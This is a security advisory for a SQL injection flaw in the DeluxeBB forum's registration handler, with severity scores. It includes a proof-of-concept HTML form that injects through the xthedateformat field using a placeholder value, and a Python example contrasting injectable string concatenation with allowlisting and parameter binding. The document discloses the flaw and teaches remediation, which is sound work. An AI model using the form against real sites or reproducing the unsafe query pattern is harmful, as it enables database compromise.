CVSS2: 6.8 Medium (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
EPSS: 0.004 Low (Percentile: 69.1%)
High-Tech Bridge SA Security Research Lab has discovered a vulnerability in DeluxeBB which could be exploited to execute arbitrary SQL commands in the application's database.
<form action="http://deluxebb/misc.php?sub=register" method="post" name="main" >
<input type="hidden" name="name" value="pentester" />
<input type="hidden" name="pass" value="pentester" />
<input type="hidden" name="pass2" value="pentester" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="hideemail" value="0" />
<input type="hidden" name="languagex" value="default" />
<input type="hidden" name="xthetimeoffset" value="0" />
<input type="hidden" name="xthedateformat" value="'SQL_CODE_HERE" />
<input type="hidden" value="" name="redirect" />
<input type="submit" value="Register" name="submit" />
</form>
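How a registration handler should treat the xthedateformat field, which carries the injected value in the form above, shown as an added example that is not DeluxeBB's code or part of the original advisory. It is a language-neutral model in Python with SQLite; the users table, its columns, the function names and the list of allowed date formats are assumptions.

```python
import sqlite3

# Hypothetical allowlist: the date formats the board would offer in its UI.
ALLOWED_DATE_FORMATS = {"d/m/Y", "m/d/Y", "Y-m-d"}

def open_db():
    """In-memory stand-in for the forum database (table and columns are assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, dateformat TEXT)")
    return db

def register_unsafe(db, name, dateformat):
    """Concatenates request values into the statement: the injectable pattern."""
    db.execute("INSERT INTO users (name, dateformat) VALUES ('%s', '%s')"
               % (name, dateformat))

def register_safe(db, name, dateformat):
    """Rejects unknown formats, then binds every value as a parameter."""
    if dateformat not in ALLOWED_DATE_FORMATS:
        raise ValueError("unsupported date format")
    db.execute("INSERT INTO users (name, dateformat) VALUES (?, ?)",
               (name, dateformat))

def demo():
    """Returns (unsafe_outcome, safe_outcome, stored_rows) for the advisory's value."""
    value = "'SQL_CODE_HERE"  # placeholder value taken from the form in the advisory
    db = open_db()
    try:
        register_unsafe(db, "pentester", value)
        unsafe = "stored"
    except sqlite3.OperationalError:
        # The leading quote closed the string literal early, so the rest of
        # the field was parsed as SQL instead of being stored as data.
        unsafe = "statement structure altered"
    try:
        register_safe(db, "pentester", value)
        safe = "stored"
    except ValueError:
        safe = "rejected"
    register_safe(db, "pentester", "Y-m-d")  # a legitimate preference still works
    rows = db.execute("SELECT name, dateformat FROM users").fetchall()
    return unsafe, safe, rows

if __name__ == "__main__":
    print(demo())
```

The allowlist alone stops this field, but binding parameters is what keeps the remaining registration fields from changing the statement's structure.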